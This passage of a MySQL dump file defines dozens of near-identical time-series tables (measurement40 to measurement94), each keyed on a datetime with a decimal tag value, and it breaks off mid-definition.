-- Table structure for table `measurement40`
--
DROP TABLE IF EXISTS `measurement40`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement40` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement400`
--
DROP TABLE IF EXISTS `measurement400`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement400` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement401`
--
DROP TABLE IF EXISTS `measurement401`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement401` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement402`
--
DROP TABLE IF EXISTS `measurement402`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement402` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement403`
--
DROP TABLE IF EXISTS `measurement403`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement403` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement404`
--
DROP TABLE IF EXISTS `measurement404`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement404` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement41`
--
DROP TABLE IF EXISTS `measurement41`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement41` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement42`
--
DROP TABLE IF EXISTS `measurement42`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement42` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement43`
--
DROP TABLE IF EXISTS `measurement43`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement43` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement44`
--
DROP TABLE IF EXISTS `measurement44`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement44` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement45`
--
DROP TABLE IF EXISTS `measurement45`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement45` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement46`
--
DROP TABLE IF EXISTS `measurement46`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement46` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement47`
--
DROP TABLE IF EXISTS `measurement47`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement47` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement48`
--
DROP TABLE IF EXISTS `measurement48`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement48` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement49`
--
DROP TABLE IF EXISTS `measurement49`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement49` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement50`
--
DROP TABLE IF EXISTS `measurement50`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement50` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement51`
--
DROP TABLE IF EXISTS `measurement51`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement51` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement52`
--
DROP TABLE IF EXISTS `measurement52`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement52` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement53`
--
DROP TABLE IF EXISTS `measurement53`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement53` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement54`
--
DROP TABLE IF EXISTS `measurement54`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement54` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement55`
--
DROP TABLE IF EXISTS `measurement55`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement55` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement56`
--
DROP TABLE IF EXISTS `measurement56`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement56` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement57`
--
DROP TABLE IF EXISTS `measurement57`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement57` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement58`
--
DROP TABLE IF EXISTS `measurement58`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement58` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement59`
--
DROP TABLE IF EXISTS `measurement59`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement59` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement6`
--
DROP TABLE IF EXISTS `measurement6`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement6` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement60`
--
DROP TABLE IF EXISTS `measurement60`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement60` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement61`
--
DROP TABLE IF EXISTS `measurement61`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement61` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement62`
--
DROP TABLE IF EXISTS `measurement62`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement62` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement63`
--
DROP TABLE IF EXISTS `measurement63`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement63` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement64`
--
DROP TABLE IF EXISTS `measurement64`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement64` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement65`
--
DROP TABLE IF EXISTS `measurement65`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement65` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement66`
--
DROP TABLE IF EXISTS `measurement66`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement66` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement67`
--
DROP TABLE IF EXISTS `measurement67`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement67` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement68`
--
DROP TABLE IF EXISTS `measurement68`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement68` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement69`
--
DROP TABLE IF EXISTS `measurement69`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement69` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement7`
--
DROP TABLE IF EXISTS `measurement7`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement7` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement70`
--
DROP TABLE IF EXISTS `measurement70`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement70` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement71`
--
DROP TABLE IF EXISTS `measurement71`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement71` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement72`
--
DROP TABLE IF EXISTS `measurement72`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement72` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement73`
--
DROP TABLE IF EXISTS `measurement73`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement73` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement74`
--
DROP TABLE IF EXISTS `measurement74`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement74` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement75`
--
DROP TABLE IF EXISTS `measurement75`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement75` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement76`
--
DROP TABLE IF EXISTS `measurement76`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement76` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement77`
--
DROP TABLE IF EXISTS `measurement77`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement77` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement78`
--
DROP TABLE IF EXISTS `measurement78`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement78` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement79`
--
DROP TABLE IF EXISTS `measurement79`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement79` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement8`
--
DROP TABLE IF EXISTS `measurement8`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement8` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement80`
--
DROP TABLE IF EXISTS `measurement80`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement80` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement81`
--
DROP TABLE IF EXISTS `measurement81`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement81` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement82`
--
DROP TABLE IF EXISTS `measurement82`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement82` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement83`
--
DROP TABLE IF EXISTS `measurement83`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement83` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement84`
--
DROP TABLE IF EXISTS `measurement84`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement84` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement85`
--
DROP TABLE IF EXISTS `measurement85`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement85` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement86`
--
DROP TABLE IF EXISTS `measurement86`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement86` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement87`
--
DROP TABLE IF EXISTS `measurement87`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement87` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement88`
--
DROP TABLE IF EXISTS `measurement88`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement88` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement89`
--
DROP TABLE IF EXISTS `measurement89`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement89` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement9`
--
DROP TABLE IF EXISTS `measurement9`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement9` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement90`
--
DROP TABLE IF EXISTS `measurement90`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement90` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement91`
--
DROP TABLE IF EXISTS `measurement91`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement91` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement92`
--
DROP TABLE IF EXISTS `measurement92`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement92` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement93`
--
DROP TABLE IF EXISTS `measurement93`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement93` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement94`
--
DROP TABLE IF EXISTS `measurement94`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement94` (
`Moment` datetime NOT NULL,
